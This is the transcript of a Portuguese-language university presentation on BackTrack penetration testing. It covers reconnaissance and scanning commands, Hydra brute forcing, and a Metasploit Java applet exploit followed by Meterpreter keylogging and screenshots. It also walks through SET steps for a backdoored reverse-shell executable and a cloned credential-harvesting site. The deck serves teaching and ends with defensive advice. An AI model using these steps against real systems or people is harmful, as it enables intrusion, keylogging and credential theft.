back track apresentação

Post on 09-Jun-2015

667 Views

Category:

Documents

0 Downloads

Preview:

Click to see full reader

DESCRIPTION

Este trabalho foi desenvolvido com a finalidade de abordar técnicas de defesas voltadas à segurança da informação, consistindo de uma atividade da cadeira de Segurança de Redes de Computadores da Universidade Católica de Pernambuco.

TRANSCRIPT

Kleber Santos

Introdução

IntroduçãoO que é?

• Ferramenta voltada para testes de penetração;

• Primeira versão lançada em 2006;• Possui mais de 300 ferramentas para

tais testes;

Devido ao tamanho do arquivo, o vídeo que consistia neste slide foi removido, porém pode ser acessado através do link:

http://www.backtrack-linux.org/

IntroduçãoUso em Certificações

• Todas oferecidas pela Offensive Security que mantém o BackTrack.

Devido ao tamanho do arquivo, o vídeo que consistia neste slide foi removido, porém pode ser acessado através do link:

http://www.backtrackbrasil.com.br/site/vd/

Pentest

• Metodologia para testes de penetração;• Simula ataques;• Verifica a segurança de um sistema;• Possibilita criação de mecanismos de

defesa;

Pentest

• Procedimentos divididos em cinco etapas:

1. Obtenção de informações do alvo;

2. Varreduras de sistema;

3. Ganho de acesso ao sistema;

4. Mantendo o acesso ao sistema;

5. Retirada de evidencias;

• Abordaremos as três primeiras etapas divididas em quatro partes;

Pentest

• Procedimentos divididos em cinco etapas:

1. Obtenção de informações do alvo;

2. Varreduras de sistema;

3. Ganho de acesso ao sistema;

4. Mantendo o acesso ao sistema;

5. Retirada de evidencias;

• Abordaremos as três primeiras etapas divididas em quatro partes;

Primeira Parte

• Obtenção de Informação;• Detecção de Sistemas Ativos;• Técnica Para Obter Informações DNS;• FINGERPRINT;

Obtenção de Informação

• Metodologia usada para "reconhecimento do terreno";

• Pode ser de forma: passiva (recursos na internet); ativa (engenharia social);

• Princípios básicos na obtenção de informações;

• PING detecta hosts ativos;

Detecção de Sistemas Ativos

FPING: Executa ping para diferentes hosts ao mesmo

tempo através de um *.txt;

HPING3: Detecta hosts, regras de firewall e realiza

varreduras de portas;

Genlist: Verifica uma lista de hosts ativos;

Detecção de Sistemas Ativos

• DNS traduz endereços de IP em nomes de domínio;

• A ferramenta nslookup permite obter informações sobre DNS;

Informações DNS

DNSENUM: Pesquisa de hosts, nomes de servidores, registros MX, IPs, etc.

DNSMAP: Descobre subdomínios relacionados ao domínio-alvo. Acompanha

wordlist;

DNSRECON: Permite consultas reversas por faixas de IP, NS, SOA, registros MX,

transferências de zonas e enumeração de serviços;

FIERCE: Retorna informações adicionais como HINFO, especificando o

processador da máquina e o servidor;

Informações DNS

• Técnica na qual se obtém informações sobre sistema operacional;

• O NMAP é utilizado para tal checagem de versões;

root@bt~# nmap –O <ip_do_alvo>

FINGERPRINT

TCP SYN (-sS) examina portas de maneira rápida e difícil

de ser detectado por firewalls ou IDS;

TCP Connect (-sT) executa varredura utilizando o Three-Way

Handshake;

UDP (-sU) possibilita varredura do protocolo UDP;

FINGERPRINT

TCP FIN (-sF, -sX, -sN) utilizados na tentativa de travessia de

firewalls;

TCP ACK (-sA) tática utilizada para detecção de regras de

firewall;

TCP Windows (-sW) varreduras por janelas, parecido com o método

ACK, porém consegue detectar portas abertas versus filtradas e não filtradas;

FINGERPRINT

Segunda Parte

• SCANNING de portas• Detecção de Sistemas Ativos;• NETCAT – Canivete Suíço;

SCANNING de portas

• Port Scan é a técnica usada para descobrir serviços vulneráveis em um sistema;

Scanning de portas: identifica portas ativas;

De vulnerabilidades: identifica fraquezas no sistema;

De redes: identifica os hosts ativos;

Detecção de Sistemas Ativos

NETCAT – Canivete Suíço

• Outra ferramenta possível para varreduras num host;

root@root:~# nc -v -z 192.168.32.128 1-4000

• Fase de Enumeração;• HTTPRINT;• AMAP, SMTP e SMTPSCAN;

Terceira Parte

Fase de Enumeração

• Nesta fase o invasor tenta obter: nomes de máquinas; usuários; serviços e versões; compartilhamentos, etc;

• A ferramenta Nbtscan nos permite obter nome e endereço MAC de um alvo;

Fase de Enumeração

• Através do nmap podemos executar varredura procurando por serviços que utilizem o protocolo UDP:

root@root~# nmap –T4 –sU –sV <ip_host_alvo>

Fase de Enumeração

• Obtendo retorno de serviços snmp podemos obter informações SNMP com o Snmpcheck:

root@root:/pentest/enumeration/snmp/snmpcheck# ./snmpcheck-1.8.pl –t <ip_host_alvo>

HTTPRINT

• Possibilita detectar versões de servidores;

• Fornece opção de exporta-las para arquivos *.html, *.csv ou *.xml

AMAP, SMTP e SMTPSCAN

AMAP tenta identificar aplicações rodando em

portas diferentes da usual.

SMTP e SMTPScan busca usuários válidos do nosso host,

destinando um IP alvo;

• Ganho de Acesso;• Abordagem à Força Bruta;• SET e Metasploit;

Quarta Parte

Ganho de Acesso

• Utiliza de ferramentas que explorem serviços como FTP e SSH;

• Explora vulnerabilidades e senhas;• A técnica de engenharia social é

extremamente importante em tal etapa;

Força Bruta

xHydra ou Hidra-GTK

Ferramenta utilizada para quebra de senhas ONLINE;

Suporta diversos protocolos; Permite utilização de arquivos auxiliares

para listas de usuários e senhas (wordlists);

Força Bruta

• Dicionários e força bruta são técnicas utilizadas para o password cracking;

• Outras ferramentas para o mesmo intuito são:

Medusa; John The Ripper;

Todas elas inclusas no BackTrack 5 R3;

Invadindo Sistemas com SET e Metasploit

Metasploit Conta com uma interface gráfica

ARMITAGE e também a linha de comando, MSFCONSOLE;

SET Tem como alvo fraquezas e estupidez

humanas;

Invadindo Sistemas com SET e Metasploit

• Através do comando msfconsole acessamos o Metasploit via linha de comando;

• Configuraremos nossa máquina BackTrack para receber informações do alvo através de uma vulnerabilidade do Java;

Invadindo Sistemas com SET e Metasploit

Invadindo Sistemas com SET e Metasploit

• root@bt:~# msfconsole

• root@bt:~# search java

• root@bt:~# use exploit/multi/browser/java_signed_applet

• root@bt:~# show options

Invadindo Sistemas com SET e Metasploit

set srvhost <ip_local_host_backTrack>

set srvport 80 #seta a porta 80 como acesso

set uripath <caminho_para_link_url>

set appletname <nome_para_o_arquivo_jar>

exploit

Invadindo Sistemas com SET e Metasploit

• Após acessar a URL gerada o alvo permitirá acesso ao invasor;

sessions –i 1 # dá acesso à máquina alvo

sysinfo# obtém informações da máquina alvo

Invadindo Sistemas com SET e Metasploit

help# lista comandos do METERPRETER

screenshot# obtém um print da tela da máquina invadida

Invadindo Sistemas com SET e Metasploit

keyscan_start# starta um sniffer para captura de navegação

keyscan_dump# exibe informações capturadas

Invadindo Sistemas com SET e Metasploit

• Técnica semelhante pode ser explorada através da ferramenta SET gerando-se um payload;

• Ao acessar a ferramenta, navega-se em:

1 – Social Engineering Attacks;4 – Create a Payload na Listener;

Invadindo Sistemas com SET e Metasploit

• Deve-se informar o IP da máquina que receberá as informações obtidas através do payload (IP da máquina BackTrack);

• Feito isso, navega-se em:

2 – Windows Reverse TCP Meterpreter;16 – Backdoored Executable (BEST);

Invadindo Sistemas com SET e Metasploit

• Após informar a porta solicitada, ele gerará o arquivo executável:

/pentest/exploits/set msf.exe

• Confirma-se com yes o start do listener;• O acesso à máquina alvo se dará após a

execução do arquivo pela mesma e executando:

sessions –i 1.

Invadindo Sistemas com SET e Metasploit

• Com a mesma ferramenta SET, podemos clonar páginas web para obter informações de uma vítima através das opções:

1 – Social Engineering Attacks;2 – Website Attack Vectors;3 – Credential Harvester Attack Vectors;2 – Site Cloner;

Invadindo Sistemas com SET e Metasploit

• Informa-se a URL do site a ser clonado;

• Acessa-se através do IP da máquina do atacante;

Obs.: Podemos atribuir um domínio ao IP para facilitar o acesso pela vítima;

Conclusão

• Técnicas de invasão estão

diretamente atreladas às

vulnerabilidades dos sistemas e das pessoas

Conclusão

• Configurar devidamente servidores;• Atualizar devidamente SOs e SWs;• Utilização de senhas fortes;• Desconfiar de coisas óbvias;• Usufruir de uma política de segurança;

Conclusão

• Atentar à boas práticas voltadas

à segurança nos dá uma garantia quanto

ao CID;

klebernox.wordpress.com/backtrack-abordagem-a-seguranca-em-redes/

Obrigado !

top related